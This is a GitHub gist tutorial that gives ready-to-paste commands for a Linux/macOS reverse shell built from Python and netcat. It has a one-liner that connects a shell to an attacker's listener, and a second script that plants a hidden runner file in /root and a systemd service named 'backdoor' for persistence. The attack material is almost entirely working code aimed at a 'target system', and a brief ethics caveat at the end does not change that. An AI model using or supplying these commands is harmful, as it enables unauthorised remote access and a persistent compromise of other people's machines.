Skip to content

Instantly share code, notes, and snippets.

@onionj

onionj/reverse_shell.md

Last active March 17, 2026 14:22
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save onionj/8dbb07c99d524cd14f2f042ee9088de1 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save onionj/8dbb07c99d524cd14f2f042ee9088de1 to your computer and use it in GitHub Desktop.
Download ZIP
Create a Linux / macOS Reverse Shell in One Command with Python and Netcat (nc)
Raw
reverse_shell.md

Create a Linux / macOS Reverse Shell in One Command with Python and Netcat (nc)

Simple Method:

On the target system, execute the following command (replace HOST with your server's IP or domain):

while :; do python3 -c "HOST='localhost'; PORT='12012'; SHELL='sh'; import datetime; print(datetime.datetime.now(),'connecting to',HOST,PORT);import subprocess; nc_process=subprocess.Popen(['nc', HOST, str(PORT)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, text=True); sh_process=subprocess.Popen([SHELL], stdin=nc_process.stdout, stdout=nc_process.stdin, stderr=nc_process.stdin, text=True); nc_process.wait(); sh_process.kill()"; sleep 1; done

Now, you can connect to the reverse shell with nc -l 12012. Run this command on your server

More Advanced Method::

Create a Linux systemd service! Replace the HOST value in the command below with your server's IP or domain and paste it into your target system.

HOST="localhost"
PORT="12012"
service_name=backdoor
runner="/root/.$service_name.sh"

tee<<EOF > $runner
#!/bin/sh
while :
do
python3 -c "HOST='$HOST'; PORT='$PORT'; SHELL='sh'; import datetime; print(datetime.datetime.now(),'connecting to',HOST,PORT);import subprocess; nc_process=subprocess.Popen(['nc', HOST, str(PORT)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, text=True); sh_process=subprocess.Popen([SHELL], stdin=nc_process.stdout, stdout=nc_process.stdin, stderr=nc_process.stdin, text=True); nc_process.wait(); sh_process.kill()"
sleep 5
done
EOF

chmod +x $runner

tee<<EOF > /etc/systemd/system/$service_name.service
[Unit]
Description=$service_name
After=network.target

[Service]
Type=simple
ExecStart=/bin/sh $runner
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target
EOF

chmod 644 /etc/systemd/system/$service_name.service
systemctl daemon-reload
systemctl enable $service_name.service
systemctl restart $service_name.service

Now, you can connect to the reverse shell with nc -l 12012. Note: Run this command on your server.

Summary:

This Gist presents two methods to establish a reverse shell on Linux and macOS using Python and Netcat (nc). The first method offers a simple, one-liner command for quick execution on the target system. The second method introduces a more advanced setup involving a systemd service for enhanced persistence. If target system lacks Python or Netcat, make sure to install them before running the scripts. Additionally, remember to replace the HOST value with your server's IP or domain. Always exercise caution and adhere to ethical considerations when implementing these techniques.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment